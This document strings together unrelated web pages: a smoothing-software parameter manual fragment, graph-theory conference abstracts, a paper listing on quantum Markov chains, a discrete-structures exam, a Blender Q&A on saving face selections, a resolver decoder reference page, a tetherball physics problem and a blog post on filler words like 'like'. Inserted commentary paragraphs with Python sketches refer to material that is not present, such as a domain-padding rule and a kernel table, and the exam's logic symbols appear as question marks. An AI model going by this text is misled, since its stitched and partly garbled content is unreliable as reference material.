- for example, '10 20:30:5 50' will return the values '10, 20, 25, 30, 50'
If no CRITERION is specified, a separate fit is provided for each nn value. If a CRITERION is specified, all values specified in nn_list are examined, and the value that minimizes the specified CRITERION is selected.

nn_range ($\mathcal{M}$, integer, default N/A, see above): specifies two values: lower, upper.
- the two values must be separated by spaces or by a comma
- only the values lower ≤ nn ≤ upper are examined, and the value that minimizes the specified CRITERION is selected
- the golden section search method is used to find a local minimum of the specified CRITERION in the [lower, upper] range

rnnw ($\mathcal{O}$, real, default 1.0, rnnw > 0): Only for 'shep' methods and only for output_points ≠ input_points. Relative number (with regard to nn) of nearest neighbors used to compute the output in points that are different from the input points.

Statistics

ihat ($\mathcal{O}$, integer, default 1, allowed 0, 1, 2): Only for the 'loess' method:
- determines how the statistical quantities are computed
- can be decreased by the 'nrr' option
- can be increased if necessary by the CRITERION parameter
Values:
- 0: the hat matrix $L$ is not computed
- 1: only the diagonal of the $L$ matrix is computed → approximate delta
- 2: the full $L$ matrix is computed → exact delta; use only for testing, as it is not meant for routine usage because computation time can be horrendous

istat ($\mathcal{O}$, integer, default 1, allowed 0, 1, 2): Only for 'shep' methods:
- regardless of the 'istat' value, no approximations are used in the statistics computation
- can be decreased by the 'nrr' option
- can be increased if necessary by the CRITERION parameter

alpha ($\mathcal{O}$, real, default 0.05, 0 < alpha < 1): Significance level for confidence intervals. Only for ihat = 2 or istat = 2.

smoothresidual ($\mathcal{O}$, logical, default false, allowed true/false): Add in the smoothed_input file a smoothing fit of the residuals for each smoothing parameter nn. This fit is computed independently of the fit that is used to obtain the residuals.

CRITERION ($\mathcal{O}$, string, default DEFAULT): Criterion for automatic smoothing parameter selection.
The DEFAULT value means:
- no automatic selection for nn_list
- AICC for nn_range

Available criteria:
- AICC: an approximation of AICC1
- AICC1: corrected/improved version of the Akaike information criterion (AIC)
- GCV: generalized cross validation
- DF1, DF2, DF3: degrees of freedom

DFtarget ($\mathcal{M}$, real, default N/A, 1 < DFtarget < n): Degrees of Freedom target → only for the 'DF' criteria.
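The 10% domain padding described for the regular-grid outputs is straightforward to reproduce. The following Python sketch is not part of the program, just an illustration of the padding formulas above; the function name is mine:

```python
def padded_domain(xs, ys, frac=0.1):
    """Expand the processing domain by frac * (range) on each side,
    as the regular-grid outputs do, so that boundary artifacts fall
    outside the region of interest."""
    dx = frac * (max(xs) - min(xs))
    dy = frac * (max(ys) - min(ys))
    return ((min(xs) - dx, max(xs) + dx),
            (min(ys) - dy, max(ys) + dy))

# e.g. h_applied samples spanning [0, 2], h_reversal spanning [10, 30]
print(padded_domain([0.0, 1.0, 2.0], [10.0, 30.0]))
# ((-0.2, 2.2), (8.0, 32.0))
```

The same rule applies to every grid variant (ha/hr, hc/hu, x/y); only the coordinate pair changes.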
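A few of the kernel weight functions from the table can be written directly as functions of the normalized distance $u \in [-1, 1]$. This is an illustrative Python sketch, not code from the program; the dictionary keys mirror the kernel numbers above:

```python
import math

# a sample of the tabulated kernels, as weight functions of u in [-1, 1]
# (the Gaussian and exponential kernels take extra shape parameters
# sigma / lambda and are omitted here)
KERNELS = {
    3: lambda u: 1 - u ** 2,                       # Epanechnikov
    4: lambda u: (1 - u ** 2) ** 2,                # quartic (biweight)
    6: lambda u: (1 - abs(u) ** 3) ** 3,           # tricube (the default)
    7: lambda u: (1 + math.cos(math.pi * u)) / 2,  # raised cosine
}

# all of these give full weight at the center and zero at the edge
for k, w in KERNELS.items():
    print(k, w(0.0), round(w(1.0), 12))
```

These shared endpoint properties are why switching kernels mostly changes how quickly the influence of distant neighbors decays, not the overall character of the fit.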
http://canadam.math.ca/2017/program/abs/cg3
CanaDAM 2017, Ryerson University, June 12 - 16, 2017 (canadam.math.ca/2017)

Computational Geometry

EDWARD LEE, University of Waterloo
Recognizing Circle Graphs
A circle graph is the intersection graph of chords on a circle. There is a correspondence between bipartite circle graphs and planar graphs, and hence every characterization of the class of circle graphs gives a characterization of the class of planar graphs. Given a graph, Naji describes a system of linear equations whose solvability determines whether or not the graph is a circle graph. We will sketch a new proof of this beautiful theorem which is considerably simpler than the existing proofs due to Naji, Gasse, and Traldi. This is joint work with Jim Geelen.

SHIKHA MAHAJAN, University of Waterloo
A Faster Algorithm for Recognizing Edge-Weighted Interval Graphs
We investigate an edge-weighted version of interval graphs. A graph with weights on its edges is an edge-weighted interval graph if we can assign intervals to the vertices so that the weight of an edge $(u,v)$ is equal to the length of the intersection of the intervals assigned to $u$ and $v$. In 2012, Köbler, Kuhnert, and Watanabe gave an algorithm to recognize such graphs in time $O(m \cdot n)$, where $m$ and $n$ are the number of edges and vertices, respectively, of the given graph. We improve the runtime of this algorithm to $O(m \cdot \log{n})$ using $PQ$ trees. Joint work with Anna Lubiw.

JAKUB SOSNOVEC, University of Warwick
Squarability of Rectangle Arrangements
We study when an arrangement of axis-aligned rectangles can be transformed into an arrangement of axis-aligned squares in $\mathbb{R}^2$ while preserving its structure. We found a counterexample to the conjecture of J. Klawitter, M. Nöllenburg and T. Ueckerdt that all arrangements without crossing and side-piercing can be squared.
Our counterexample also works in a more general case where we only need to preserve the intersection graph and we forbid side-piercing between squares. We also show counterexamples for transforming box arrangements into combinatorially equivalent hypercube arrangements. Finally, we introduce a linear program deciding whether an arrangement of rectangles can be squared in a more restrictive version where the order of all sides is preserved. Joint work with Matěj Konečný, Stanislav Kučera, Michal Opler, Štěpán Šimsa and Martin Töpfer.
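The edge-weighted interval graph model in Mahajan's abstract can be stated concretely: an interval assignment is consistent with the edge weights exactly when each weight equals the length of the intersection of the endpoint intervals. A small illustrative Python sketch (the names are mine, not from the talk):

```python
def weights_from_intervals(intervals, edges):
    """Compute edge weights induced by an interval assignment:
    weight(u, v) = length of the intersection of the two intervals."""
    def overlap(a, b):
        lo = max(a[0], b[0])
        hi = min(a[1], b[1])
        return max(0.0, hi - lo)  # disjoint intervals overlap by 0
    return {(u, v): overlap(intervals[u], intervals[v]) for (u, v) in edges}

# three vertices on a line; u and w do not overlap at all
iv = {'u': (0.0, 3.0), 'v': (2.0, 5.0), 'w': (4.0, 6.0)}
print(weights_from_intervals(iv, [('u', 'v'), ('v', 'w')]))
# {('u', 'v'): 1.0, ('v', 'w'): 1.0}
```

The recognition problem the talk addresses is the inverse direction: given the weights, decide whether any such interval assignment exists.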
https://www.semanticscholar.org/paper/Open-Quantum-Random-Walks-and-Quantum-Markov-Chains-Mukhamedov-Souissi/ddb15d2d27fa8de1ba0b7ea389796ff1ee4863b6
# Open Quantum Random Walks and Quantum Markov Chains @article{Mukhamedov2019OpenQR, title={Open Quantum Random Walks and Quantum Markov Chains}, author={Farrukh Mukhamedov and Abdessatar Souissi and Tarek Hamdi}, journal={Functional Analysis and Its Applications}, year={2019}, volume={53}, pages={137-142} } • Published 1 April 2019 • Mathematics • Functional Analysis and Its Applications In the present paper we construct quantum Markov chains associated with open quantum random walks in the sense that the transition operator of a chain is determined by an open quantum random walk and the restriction of the chain to the commutative subalgebra coincides with the distribution ℙρ of the walk. This sheds new light on some properties of the measure ℙρ. For example, this measure can be considered as the distribution of some functions of a certain Markov process. 5 Citations ### Quantum Markov Chains on Comb Graphs: Ising Model • Mathematics Proceedings of the Steklov Institute of Mathematics • 2021 Abstract We construct quantum Markov chains (QMCs) over comb graphs. As an application of this construction, we prove the existence of a disordered phase for Ising type models (within the QMC scheme) ### Refinement of quantum Markov states on trees • Mathematics, Computer Science • 2021 It turns out that localized QMS has the mentioned property which is called sub-Markov states, this allows us to characterize translation invariant QMS on regular trees. 
### A crossover between open quantum random walks to quantum walks • Mathematics, Physics • 2020 We propose an intermediate walk continuously connecting an open quantum random walk and a quantum walk with parameters $M\in \mathbb{N}$ controlling a decoherence effect; if $M=1$, the walk coincides ### Mean Hitting Time for Random Walks on a Class of Sparse Networks • Mathematics Entropy • 2022 For random walks on a complex network, the configuration of a network that provides optimal or suboptimal navigation efficiency is meaningful research. It has been proven that a complete graph has ## References SHOWING 1-10 OF 68 REFERENCES ### Quantum Markov Chains Associated with Open Quantum Random Walks • Mathematics Journal of Statistical Physics • 2019 In this paper we construct (nonhomogeneous) quantum Markov chains associated with open quantum random walks. The quantum Markov chain, like the classical Markov chain, is a fundamental tool for the ### Open quantum random walks, quantum Markov chains and recurrence • Mathematics Reviews in Mathematical Physics • 2019 In the present paper, we construct QMCs (Quantum Markov Chains) associated with Open Quantum Random Walks such that the transition operator of the chain is defined by OQRW and the restriction of QMC ### Limit Theorems for Open Quantum Random Walks • Mathematics, Physics • 2013 We consider the limit distributions of open quantum random walks on one-dimensional lattice space. We introduce a dual process to the original quantum walk process, which is quite similar to the ### Open Quantum Random Walks • Physics, Mathematics • 2012 A new model of quantum random walks is introduced, on lattices as well as on finite graphs. These quantum random walks take into account the behavior of open quantum systems. 
They are the exact ### On a Class of Quantum Channels, Open Random Walks and Recurrence • Mathematics • 2014 We study a particular class of trace-preserving completely positive maps, called PQ-channels, for which classical and quantum evolutions are isolated in a certain sense. By combining open quantum ### Quantum Markov fields on graphs • Mathematics • 2009 We introduce generalized quantum Markov states and generalized d-Markov chains which extend the notion quantum Markov chains on spin systems to that on $C^*$-algebras defined by general graphs. As ### Quantum Markov chains: A unification approach • Mathematics Infinite Dimensional Analysis, Quantum Probability and Related Topics • 2020 In this paper, we study a unified approach for quantum Markov chains (QMCs). A new quantum Markov property that generalizes the old one, is discussed. We introduce Markov states and chains on general ### Open quantum walks • Physics, Mathematics The European Physical Journal Special Topics • 2019 Open quantum walks (OQWs) are a class of quantum walks, which are purely driven by the interaction with the dissipative environment. In this paper, we review theoretical advances on the foundations ### Stopping times for quantum Markov chains • Mathematics • 1992 In the paper we introduce stopping times for quantum Markov states. We study algebras and maps corresponding to stopping times, give a condition of strong Markov property and give classification of ### Open Quantum Random Walks: Reducibility, Period, Ergodic Properties • Mathematics • 2014 We study the analogues of irreducibility, period, and communicating classes for open quantum random walks, as defined in (J Stat Phys 147(4):832–852, 2012). We recover results similar to the standard
http://www.ques10.com/p/1149/discrete-structures-question-paper-dec-2012-comp-1/
Question Paper: Discrete Structures : Question Paper Dec 2012 - Computer Engineering (Semester 3) | Mumbai University (MU)

## Discrete Structures - Dec 2012

### Computer Engineering (Semester 3)
TOTAL MARKS: 80
TOTAL TIME: 3 HOURS
(1) Question 1 is compulsory.
(2) Attempt any three from the remaining questions.
(3) Assume data if required.
(4) Figures to the right indicate full marks.

1(a) Show that $1^2 + 3^2 + 5^2 + \cdots + (2n-1)^2 = \dfrac{4n^3 - n}{3}$. (6 marks)
1(b) Show that if any 5 numbers from 1 to 8 are chosen, then two of them will add to 9. (6 marks)
1(c) Out of 250 candidates who failed in an examination, it was revealed that 128 failed in mathematics, 87 in physics and 134 in aggregate. 31 failed in mathematics and in physics, 54 failed in the aggregate and in mathematics, 30 failed in aggregate and in physics. Find how many candidates failed: i. In all the 3 subjects ii. In mathematics but not in physics iii. In the aggregate but not in physics iv. In physics but not in aggregate or in mathematics (8 marks)
2(a) Determine whether the following relations are symmetric, asymmetric and antisymmetric. (6 marks)
2(b) Construct a truth table to determine whether the given statement is a tautology, contradiction or neither: i. (q ? p) ? (q ? ~p) ii. (p ? ~q) ? p (6 marks)
2(c) If R is a relation on the set of integers $\mathbb{Z}$ defined by $R=\{(x,y) : x \in \mathbb{Z},\ y \in \mathbb{Z},\ x-y \text{ is divisible by } 3\}$, show that the relation R is an equivalence relation and describe the equivalence classes. (8 marks)
3(a) Define with examples injective, bijective and surjective functions. (6 marks)
3(b) Let $A=\{a,b,c,d,e\}$ and let R and S be two relations on A whose corresponding digraphs are shown below. Find the complement of R, $R^{-1}$, $R \cap S$ and $R \cup S$. (8 marks)
3(c) A connected planar graph has 10 vertices each of degree 3. Into how many regions does a representation of this planar graph split the plane? (6 marks)
4(a) Determine whether the following pairs of graphs are isomorphic or not.
(6 marks)
4(b) Let $f: \mathbb{R} \to \mathbb{R}$, $f(x)=x^2-1$, $g(x)=4x^2+2$. Find i) $f \circ (g \circ f)$ ii) $g \circ (f \circ g)$ (6 marks)
4(c) Draw the Hasse diagram of the poset $D_{30}$ and identify whether it is linearly ordered or not. (8 marks)
5(a) Let $A=\{1,2,3,4\}$ and $R=\{(1,2), (2,1), (2,2), (4,3), (3,1)\}$. Find the transitive closure of the relation R by Warshall's algorithm. (6 marks)
5(b) Define a ring and a field. Let $R=\{0,1,2,3\}$. Show that the modulo 4 system is a ring. (8 marks)
5(c) Determine which of the following graphs contains an Eulerian or Hamiltonian circuit. (6 marks)
6(a) Consider the (2,6) group encoding function $e: B^2 \to B^6$ defined by: e(00)=000000, e(01)=011110, e(10)=101101, e(11)=110011. Decode the following relative to the maximum likelihood decoding function: i) 001110 ii) 111101 iii) 110010 (8 marks)
6(b) Solve the recurrence relation $a_n = 4(a_{n-1} - a_{n-2})$ where $a_0 = 1$, $a_1 = 1$. (6 marks)
6(c) Show that $\{1,5,7,11\}$ is an abelian group under multiplication modulo 12. (6 marks)
7(a) Define with examples: i. Normal subgroup ii. Spanning tree iii. Planar graph iv. Quantifiers (8 marks)
7(b) Consider chains of divisors of 4 and 9, i.e., $L_1=\{1,2,4\}$ and $L_2=\{1,3,9\}$, and the partial ordering relation of division on $L_1$ and $L_2$. Draw the lattice $L_1 \times L_2$. (6 marks)
7(c) Prove that every field is an integral domain. (6 marks)
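As a quick numeric sanity check of the identity in question 1(a) (not part of the paper, just a verification before attempting the induction proof), both sides can be compared in Python for small n:

```python
def sum_odd_squares(n):
    # left-hand side: 1^2 + 3^2 + ... + (2n-1)^2
    return sum((2 * k - 1) ** 2 for k in range(1, n + 1))

def closed_form(n):
    # right-hand side: (4n^3 - n) / 3, kept in exact integer arithmetic
    return (4 * n ** 3 - n) // 3

# agreement for n = 1..49 strongly suggests the identity before proving it
assert all(sum_odd_squares(n) == closed_form(n) for n in range(1, 50))
print(sum_odd_squares(10), closed_form(10))
# 1330 1330
```

The actual exam answer would then prove the identity by induction on n, the check only guards against a misread formula.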
https://blender.stackexchange.com/questions/51296/is-there-a-way-to-save-selection-by-faces?noredirect=1
# Is there a way to save selection by faces

I'm trying to find a way to save a selection of faces. I tried Vertex Groups, but the issue with Vertex Groups is that they also pull in faces that are merely bounded by 4 vertices assigned to the group; there are some cases where this doesn't apply, as the image explains. So is there a way to save my selected faces, so I don't have to go through the whole process of reselecting them each time I need to do so? If you check the image, I didn't assign the hatched faces to the Vertex Group, yet when I select the Vertex Group, they get selected. I understand that they got selected because the four boundary vertices are assigned to the Vertex Group, but I need to save only the face selection, not the vertex selection.

This is a limitation of the current Vertex Groups system that has been an occasional nuisance. That is why they are called Vertex Groups, not "Face Groups"; selections of vertices don't unequivocally define groups of faces, since a vertex can belong to an arbitrary number of them. Would be nice to hear about more options and solutions for this from other users around here.

The way I generally solve this is by using material slots instead, if you don't mind the additional pollution in the materials list. Go to Properties Window > Materials Tab > Add New Material Slot button, and then with the desired faces selected press the Assign button. Since material slots work on a per-face basis instead of single vertices, they can correctly define face groups. You can still assign materials independently, but you can't have a face belong to more than one slot unfortunately, so you may end up having several slots with the same material. Different intersections of overlapping selections may require an exponentially growing number of slots.

• But that will change the material, right?
– Georges Apr 23 '16 at 22:41
• Yeah I guess this is the best solution, in case I need several groups of faces to have the same material, I just have to copy, rename and keep the same parameters. Thanks! – Georges Apr 23 '16 at 22:50
• Yeah, you can use the same material on multiple slots of the same object. You'll get some redundancy, but I guess it's better than nothing. – Duarte Farrajota Ramos Apr 24 '16 at 0:46

Actually, in Blender 2.80 you can save face selections using the "Face Maps" grouping. It is located in the "Object Data" panel. It works the same as vertex groups but stores faces instead.

It's possible to store the selection state into a Vertex Color map. The following script creates a vertex color map Selection with a black face for every selected face and a white face for every non-selected. Strictly speaking this would be "every vertex of every polygon". But the main difference to vertex groups is that each vertex appears multiple times in the vertex color map – once for every polygon that it's part of. So it's possible to identify the faces by their vertices.

```python
import bpy

obj = bpy.context.active_object
me = obj.data
bpy.ops.object.mode_set(mode='OBJECT')
col = me.vertex_colors.new('Selection')
for poly in me.polygons:
    for l_ix in poly.loop_indices:
        if poly.select:
            col.data[l_ix].color = (0, 0, 0)
bpy.ops.object.mode_set(mode='EDIT')
```

The following script restores the selection from the vertex color map.
```python
import bpy, bmesh
from mathutils import Color

bpy.context.tool_settings.mesh_select_mode = (False, False, True)
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.select_all(action='DESELECT')
bpy.ops.object.mode_set(mode='OBJECT')

obj = bpy.context.active_object
me = obj.data
bm = bmesh.new()
bm.from_mesh(me)
col = me.vertex_colors['Selection']
for (poly, bm_poly) in zip(me.polygons, bm.faces):
    # Only look at the first vertex as all should have the same color
    l_ix = poly.loop_indices[0]
    if col.data[l_ix].color == Color((0, 0, 0)):
        bm_poly.select_set(True)
bm.to_mesh(me)
bm.free()
bpy.ops.object.mode_set(mode='EDIT')
```

By adjusting the name of the vertex color map you can store multiple selections for every object.
https://uk.mathworks.com/help/mcb/ref/resolverdecoder.html
# Resolver Decoder

Compute electrical angular position of resolver

• Library: Motor Control Blockset / Sensor Decoders

## Description

The Resolver Decoder block calculates the electrical angular position of the resolver from the resolver sine and cosine output signals. The resolver uses a primary sinusoidal excitation input signal to generate the modulated secondary sine and cosine waveforms. You must normalize these waveforms (within the range of [-1,1] and centered at 0) and sample them to obtain the secondary sine and cosine input signals of the Resolver Decoder block. The block computes and outputs the resolver position in [0, 2π] radians. The block can also add a phase delay to the sampled sine and cosine signals with respect to the excitation signal.

Note: The block inputs should have identical amplitude and data types (either signed fixed or floating point).

### Equations

The block computes the average amplitude, the peak amplitude, and the sign of the peak amplitude of a signal cycle as

$\hat{A}_{\mathrm{average}}=\frac{1}{n}\sum _{i=0}^{n-1}\left\vert \hat{A}_{i}\right\vert$

$\hat{A}_{\mathrm{peak}}=\hat{A}_{\mathrm{average}}\times \frac{\pi }{2}$

where:

• $\hat{A}_{\mathrm{average}}$ is the average amplitude value of a signal cycle
• $n$ is the number of samples per excitation cycle
• $\hat{A}_{\mathrm{peak}}$ is the peak amplitude value of a signal cycle

The block computes the electrical angular position of the resolver as

$\theta =\operatorname{atan2}\left( {u}_{\mathrm{sin\_peak}},\,{u}_{\mathrm{cos\_peak}}\right)$

where:

• ${u}_{\mathrm{sin\_peak}}$ is the $\hat{A}_{\mathrm{peak}}$ of the secondary sine signal
• ${u}_{\mathrm{cos\_peak}}$ is the $\hat{A}_{\mathrm{peak}}$ of the secondary cosine signal
• $\theta$ is the electrical angular position of the resolver

## Ports

### Input

Sin: Secondary sine waveform output from the resolver that is sampled and normalized within the range of [-1, 1] and centered at 0.
Data Types: `single` | `double` | `fixed point`

Cos: Secondary cosine waveform output from the resolver that is sampled and normalized within the range of [-1, 1] and centered at 0.
Data Types: `single` | `double` | `fixed point`

### Output

Electrical angular position of the resolver (and the rotor) in [0, 2π] radians.
Data Types: `single` | `double` | `fixed point`

## Parameters

- The phase delay that the block must add to the `Sin` and `Cos` input port signals.
- Number of samples available in one cycle of the `Sin` and `Cos` input port signals.
- The data type of the resolver position output `θ`.
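The amplitude and angle computations described above can be sketched in a few lines of Python. This is an illustrative approximation, not MathWorks code; in particular, the block recovers the sign of each peak from the excitation signal, which is stubbed out here with `math.copysign` using the known test angle:

```python
import math

def peak_amplitude(samples):
    # mean of |x| over a full cycle, times pi/2, recovers the peak of a
    # sinusoid (the mean of |sin| over one cycle is 2/pi)
    n = len(samples)
    return (sum(abs(x) for x in samples) / n) * (math.pi / 2)

def electrical_angle(sin_peak_signed, cos_peak_signed):
    # four-quadrant arctangent of the signed peaks, wrapped into [0, 2*pi)
    return math.atan2(sin_peak_signed, cos_peak_signed) % (2 * math.pi)

# demo: resolver at 30 degrees electrical, 64 samples per excitation cycle
theta = math.radians(30)
n = 64
carrier = [math.sin(2 * math.pi * i / n) for i in range(n)]
u_sin = [math.sin(theta) * c for c in carrier]  # modulated secondary sine
u_cos = [math.cos(theta) * c for c in carrier]  # modulated secondary cosine

# sign recovery stubbed with the known angle (an assumption of this sketch)
a_sin = math.copysign(peak_amplitude(u_sin), math.sin(theta))
a_cos = math.copysign(peak_amplitude(u_cos), math.cos(theta))
print(round(math.degrees(electrical_angle(a_sin, a_cos)), 1))
# 30.0
```

Because both peaks are scaled by the same carrier-dependent factor, the ratio fed to the arctangent is exact and the recovered angle matches the true electrical position.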
https://brilliant.org/problems/tetherball-2/
# Tetherball

Consider a ball hung from a rope of length $l=2~\text{m}$ which is attached to the top of a vertical pole. Initially, the rope is vertical and the ball is given a horizontal initial speed $v_{0}$. What is the minimum initial speed $v_{0}$, in meters per second, for which the ball hits the top of the pole? Ignore friction and the mass of the rope, and treat the ball as a point mass.

Details and assumptions

$g=9.8~\text{m}/\text{s}^2$
http://lisp-ai.blogspot.com/2012/08/parallel-operations-that-are-dependent.html
## Tuesday, August 28, 2012

### Shape-dependent parallelism

Map, reverse, and transpose are parallel operations whose targeting scheme is dependent upon the shape of their argument. For example, here is the targeting scheme generated by the map operation on a list whose shape (or size) is 3 with respect to func:

{(nth 0) func
 (nth 1) func
 (nth 2) func}

On the other hand, the reverse operation runs swap operations in parallel. With respect to a list of size five, the reverse operation runs two swap operations, leaving the middle unchanged:

{(list-places (nth 0) (nth 4)) swap
 (list-places (nth 1) (nth 3)) swap}

Here is the transpose operation on a matrix that is shaped like [[0 1 2] [3 4 5]]:

{(list-places (nth 1) (nth 3) (nth 4) (nth 2)) (shift 4)
 (list-places (compose first dimensions) (compose second dimensions)) swap}

The transpose operation is much more complicated than the others because it also reverses the dimensions of the grid.
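The shape-dependent targeting idea can be sketched in Python (a translation of the idea, not the original Lisp): map assigns one independent target per position, while reverse pairs mirrored positions for parallel swaps, leaving the middle of an odd-length list untouched.

```python
def map_targets(n, func="func"):
    # map: one independent (place, operation) target per element
    return [(("nth", i), func) for i in range(n)]

def reverse_targets(n):
    # reverse: swap mirrored index pairs in parallel; for odd n the
    # middle element needs no target at all
    return [((("nth", i), ("nth", n - 1 - i)), "swap") for i in range(n // 2)]
```

For a list of size five, `reverse_targets(5)` produces exactly the two swap targets shown above.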
https://languagelog.ldc.upenn.edu/nll/?p=22504
## Like thanks In addition to the evergreen list of things to be thankful for — family, friends, health, worlds full of wonder — I'd like to make a plug for the internet, that connects us to all of them. Less directly than we might sometimes wish, but much more easily. And for anyone interested in speech, language, and communication, the internet and the virtual universe behind it offer an extraordinary opportunity to make voyages of discovery, and to share what we find. Here's a tiny example, something from the margins of a small project. I've been dis-editing the transcripts of some Fresh Air interviews, adding disfluencies and so on. Because there are hundreds if not thousands of these interviews available both as audio files and as (clean) transcripts, they offer an interesting opportunity to look at various phenomena in a more or less consistent setting. Yesterday I reported a bit of evidence about "UM / UH accommodation", and this morning I dis-edited a couple more transcripts, and I thought I noticed a generational effect in the frequency of the discourse particle like, as in this quotation from an interview with Lena Dunham: I mean, my mom always tells the story of like, you know, from the backseat of the car she and my parent- my dad, when I was like three, would be talking about someone from work. And I'd scream what color's her hair? How old is she? Does she have a husband? Like I just- I needed to know everything about everyone. I'm not the first — or the thousandth — person to notice that this is an example of language change in progress. See "Like youth and sex" (6/28/2011) for some previous discussion. But the effect struck me as pretty consistent on an individual basis in the Fresh Air interviews that I've seen so far, and so I decided to look at it a bit more quantitatively. The evidence for like-accommodation is more equivocal (though the effect may turn out to be real): Not a big thing. But I'm thankful! 
Update– Interestingly, there's similar age grading of speaking rate (except for Carrie Brownstein, whose speech in the analyzed interview has very long silent pauses throughout): This might just be older people slowing down. But maybe it supports the view of a young person of my acquaintance: ok like i am always gonna proudly overuse the word "like" bc it makes all the right people mad,, and i like it as a word, i think its aesthetically pleasing,its nice to pepper it in its like. u are winding ur speech around..a central multi purpose word that can even serve as interjection.. like is the powerhouse of the sentence 1. ### D.O. said, November 26, 2015 @ 3:37 pm 感恩 2. ### Michael Watts said, November 26, 2015 @ 4:45 pm I was in a Chinese class with a young (early 20s) Australian girl who peppered her Chinese speech with 'like' (the english word, although context suggests an analysis other than "english word"), every few words or so. Her English speech was not so affected. It's not clear to me what to conclude about what 'like' meant to her, but maybe it was what she said when she was trying to think of how to say something? 3. ### Victor Mair said, November 26, 2015 @ 7:33 pm I'm grateful that I live in a country where the internet is not filtered, constricted, banned, blocked, and censored to such a degree that only a miniscule amount of its wealth can get through. As for "like", for what it's worth: "Like, Uh, You Know: Why Do Americans Say 'You Know' And Use Other Verbal Fillers So Often?", by Palash Ghosh (International Business Times, 1/29/14): On the evening of Jan. 17, Hollywood film mogul Harvey Weinstein appeared as a guest on Piers Morgan Live on CNN to discuss his plan to make a movie that will attack the National Rifle Association and to respond to accusations that his films portray the Catholic Church negatively. 
While the majority of the viewing audience likely focused on the content of Weinstein's replies, a smaller segment of the audience might have been alarmed (or annoyed or amused) by the movie producer's penchant for using the meaningless phrase “you know” in his discourse. Indeed, Weinstein used that term a whopping 84 times during the broadcast. Linguists call interjections like “you know” and “like” and “um” and “I mean” and a multitude of others “filler” or “discourse particles” – that is, an unconscious device that serves as a pause in the middle of a sentence as the speaker gathers his or her thoughts but wants to maintain the listener’s attention. However, it would appear that such fillers – which have minimal grammatical or lexical value – have infiltrated daily conversations to such an extent that they threaten to further damage the beauty, power and effectiveness of verbal communication…. [(myl) This is actually pernicious nonsense — nonsense because the only thing that has changed over time is what the "fillers" are, not how frequent they are, on average; and pernicious because it feeds into all the world's worst "kids today" prejudices.] 4. ### phspaelti said, November 26, 2015 @ 8:47 pm Is the ratio of TG / Guest speech always roughly the same across interviews? Or are there significant variations? 5. ### Bloix said, November 26, 2015 @ 9:54 pm "because the only thing that has changed over time is what the "fillers" are," I do not believe that this is true. I think a man of the status, power, and experience in public speaking of a Harvey Weinstein would at some point in the not-too-distant past have been able to spin out long, grammatically correct sentences without hesitation, filler, or self-interruption. 6. ### Ken Miner said, November 26, 2015 @ 10:57 pm This is actually pernicious nonsense I hear you, but we still admire "good speakers". Keith Wrightson teaches a course at Yale on Tudor-Stewart England. He lectures straight through.
He is just about the best lecturer I have ever heard. He never utters an "ah" or an "er". Every sentence is polished perfection, he uses adult vocabulary, he makes no references to pop culture, and he seems to have no ego. He uses some notes, but they do not get in his way. Yet he won a teaching award! There is a God after all. [(myl) Individuals at any time in history differ widely among themselves in how frequently they use all sorts of fillers, just as they differ in how fast they talk and so on. And any individual also differs in filler frequency across occasions. What is pernicious nonsense is the idea that "such fillers […] have infiltrated daily conversations" to a greater and greater extent over time, or that "they threaten to further damage the beauty, power and effectiveness of verbal communication" to a steadily increasing extent.] 7. ### Rebecca said, November 26, 2015 @ 11:44 pm I would imagine that most people have times when they use more or less fillers. I was curious to hear what filler-free speech sounded like when it was not part of a theatrical performance, so I googled Keith Wrightson, mentioned by Ken Miner above. Picking the first video that popped up, he used at least three "uh"s or "um"s in the first 15 seconds or so. Maybe an off day, or maybe certain fillers don't interrupt our attention to content, or maybe certain contexts (like on TV or radio) make them more noticeable, since we hear so much scripted speech in those contexts? 8. ### Ken Miner said, November 27, 2015 @ 12:15 am @ Rebecca You're quite right, I checked it. So I was wrong with my "never". But when he gets going in his actual lectures (what you watched was the beginning of his intro to the course), fillers are – I'll be more careful this time – nearly absent. I'm sure I've heard speakers who have trained themselves never to use hesitation forms. 
I tried to do that in my own lectures, because I know how annoying they can be, especially when overdone, and didn't find it that hard. 9. ### Ken Miner said, November 27, 2015 @ 12:19 am By the way, all you have to do, when you feel a vocal filler coming on, is to pause. 10. ### Michael Watts said, November 27, 2015 @ 1:34 am I often pause to think instead of vocalizing an uhh (I also often say the uhh). Pausing is extremely disorienting for your audience, if there's any question at all of whether you're going to continue speaking. 11. ### Chas Belov said, November 27, 2015 @ 3:29 am TG = Terry Gross? 12. ### joanne salton said, November 27, 2015 @ 3:30 am Surely the "like" is sometimes a sort of badge of identity, and also a signal that one does not wish to come over harsh and pretentious (and old-fashioned like me), and thus especially frequent. If that is not true then it would be the most counter-intuitive linguistic fact I have ever encountered. 13. ### Chas Belov said, November 27, 2015 @ 3:33 am Ah, yes, I see that now that I've read the UH/UM accommodation post, which would seem to be a prerequisite for comprehending this current post. 14. ### mgh said, November 27, 2015 @ 4:45 am Does the correlation hold up if you plot filler frequency vs speech time rather than number of words, ie normalize for differences in rates of speech? I am thinking that Willie Nelson speaks slowly, and you may need more fillers as you try to talk faster. [(myl) Actually Willie Nelson uses "uh" at a pretty good clip even in terms of word-count frequency: 27.7 per thousand words.
He doesn't ever use "um", but in terms of UM+UH, his overall rate is still higher than any of the other Fresh Air interviewees I've checked, both in instances per thousand words and in terms of instances per minute:

| Speaker | Birth | Per kW | Per Min |
|---|---|---|---|
| WillieNelson | 1933 | 27.73 | 4.23 |
| StephenKing | 1947 | 14.53 | 2.42 |
| JillSoloway | 1965 | 15.48 | 2.77 |
| DanielTorday | 1977 | 17.93 | 4.07 |
| RichardFord | 1944 | 10.45 | 2.00 |
| CarrieBrownstein | 1974 | 20.18 | 2.58 |
| JohnKander | 1927 | 19.13 | 2.51 |

If we add in the counts of "like", then Willie is still the winner in terms of frequency per thousand words, but he loses to Jill Soloway and Daniel Torday in terms of frequency per minute:

| Speaker | Birth | Per kW | Per Min |
|---|---|---|---|
| WillieNelson | 1933 | 30.14 | 4.60 |
| StephenKing | 1947 | 20.42 | 3.40 |
| JillSoloway | 1965 | 26.58 | 4.75 |
| DanielTorday | 1977 | 28.29 | 6.43 |
| RichardFord | 1944 | 13.86 | 2.65 |
| CarrieBrownstein | 1974 | 28.04 | 3.59 |
| JohnKander | 1927 | 23.48 | 3.08 |

